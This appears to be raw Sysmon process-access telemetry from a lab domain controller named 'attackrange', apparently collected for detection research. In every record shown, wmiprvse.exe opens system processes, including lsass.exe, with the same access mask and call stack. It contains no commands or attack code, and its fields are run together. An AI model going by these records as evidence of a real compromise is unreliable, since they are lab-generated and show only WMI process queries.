16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.452{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 